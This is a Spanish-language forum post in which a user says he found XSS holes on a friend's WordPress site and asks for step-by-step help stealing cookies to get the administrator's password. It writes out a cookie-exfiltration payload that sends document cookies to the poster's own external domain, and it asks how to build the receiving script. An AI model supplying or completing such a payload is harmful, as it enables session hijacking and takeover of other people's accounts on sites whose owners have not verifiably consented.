Buenos dias , gente de hackispano, e venido por aca ya que en otras comundades la verdad no me an ayudado ! =( y necesito ayuda ! BUENO AQUI LE SPONGO MIS DUDAS !

Bueno , pues ya logre un gran avanze en lo que corresponde a inyecciones xxs ( crosse site scripting ) y inyecciones html , Bueno ahroa tengo una duda . Tengo la pagina de un amigo por ejemplo crashh.me/wordspress y e logrado encontrar varias vulberabilidades xxs principalmente *, ahi subo algunas fotos





Pues logre hacer los tres ataques xxs , por lo que se que la pagina es vulnerable verdad , aunque la pregunta ahora seria que hacer verdad ! =)

" posdata : El dueño de la pagina es mi amigo , asi que no quiero hacerle ningun daño , a la pagina es tan solo algo como personal que tenemos entre el yo yo ! =) " asi que por eso no se preocupen , es tan solo *por diversion y para mostrarle que se puede ! "

BUENO SIGAMOS *

Pues , estaba leyendo y lo que debo hacer ahora es instalar *UN CODIGO SCRIPT COMO ESTE




para robar las cookies y asi poder , sacar la pass del administrador verdad ! La foto me quedo un poco mal , pero creo se pueda entender !

--------------------------------------------------------------------------

Pues como ya les habia mensionado haber si alguien me ayuda con una guia paso a paso de como robar LOS COOKIES , en una pagina web vulnerable a xss ! Si alguien me quisiera ayudar , pues bienvenido sea ! Un saludo y desde ya gracias !.

Bueno pues tampoco soy tan comodo de venir a pedir sin antes almenos haber leido ! =)

Bueno pues , lo de robar cookies por xss , lo se todo en teoria ! Osea en una pagina , que es vulnerable a xss y los comentarios estan habilitados .

Primero deberia crearme un dominio web en el cual se enviarian las cookies verdad ! BUENO YA LO HIZE Y ES ESTE



y ahi deberia pone en un coment de la pagina este codigo

javascript:void(document.location="http://hackedbyjustinxzibit.t35.com/cookie.php?c="+document.cookies)

para que envie las cookies a la direccin mencionada !

AQUI ES LA PARTE QUE NO ENTIENDO!... , SI ESTA BIEN ESE SCRITP Y DEBE SER COLOCADO EN LOS COMENTARIOS ! Y SI EN EL DOMIINIO WEB CREADO SE DEBE CREAR UN DIRECTORIO . O UN ARCHIVO CON UN NUEVO CODIGO , PUES AHI STA TODO , sI ALGUIEN ME QUIERE AYUDAR , LE AGRADECERIA UN MONTON LA VERDAD ! un saludo a toda la comunidad !